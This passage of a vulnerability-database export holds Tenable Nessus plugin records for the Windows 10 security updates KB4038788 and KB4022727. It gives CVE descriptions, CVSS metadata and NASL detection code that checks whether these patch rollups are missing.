(CVE-2017-8643)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.(CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. 
An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. 
An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707, \n CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when\n Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. 
An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. 
An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content. To\n exploit the bypass, an attacker must trick a user into\n either loading a page containing malicious content or\n visiting a malicious website. The attacker could also\n inject the malicious page into either a compromised\n website or an advertisement network. The update\n addresses the bypass by correcting how the Edge CSP\n validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740,\n CVE-2017-8752, CVE-2017-8753, CVE-2017-8755,\n CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038788/windows-10-update-kb4038788\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb942e3e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038788.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038788');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038788])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:29:34", "description": "The remote Windows 10 version 1507 host is missing security update KB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V instruction emulation due to a failure to properly enforce privilege levels. An attacker on a guest operating system can exploit this to gain elevated privileges on the guest. Note that the host operating system is not vulnerable. 
(CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in Device Guard. A local attacker can exploit these, via a specially crafted script, to bypass the Device Guard Code Integrity policy and inject arbitrary code into a trusted PowerShell process. (CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. 
An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. 
An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465, CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. (CVE-2017-8470, CVE-2017-8471, CVE-2017-8473, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the Windows Secure Kernel Mode feature due to a failure to properly handle objects in memory. A local attacker can exploit this, via a specially crafted application, to bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-8547)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose the contents of memory. 
(CVE-2017-8554)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8530", 
"CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8554", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022727.NASL", "href": "https://www.tenable.com/plugins/nessus/100765", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100765);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n 
\"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022727\");\n script_xref(name:\"MSFT\", value:\"MS17-4022727\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. 
(CVE-2017-0218,\n CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. 
(CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel 